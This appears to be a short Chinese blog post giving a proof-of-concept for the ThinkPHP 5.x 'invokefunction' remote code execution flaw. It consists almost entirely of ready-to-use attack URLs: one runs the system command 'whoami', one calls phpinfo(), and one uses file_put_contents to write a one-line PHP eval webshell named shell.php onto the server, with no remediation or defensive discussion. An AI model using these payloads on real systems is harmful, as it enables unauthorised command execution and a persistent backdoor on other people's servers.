ThinkPHP 5.x远程代码执行getshell

2019-05-08  本文已影响0人  这是什么娃哈哈

ThinPHP 5.1代码执行漏洞POC

https://www.xxxx.cn/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

image.png

执行phpinfo()函数:

https://www.xxxx.cn/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

写入webshell:

https://www.xxxx.cn/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=%3c%3fphp+%40eval(%24_POST%5b%27chopper%27%5d)%3b%3f%3e
上传之后会有一个回显

image.png

上传完成之后

测试是否报错

参考:https://blog.csdn.net/qq_36711453/article/details/84977739

上一篇下一篇

猜你喜欢

热点阅读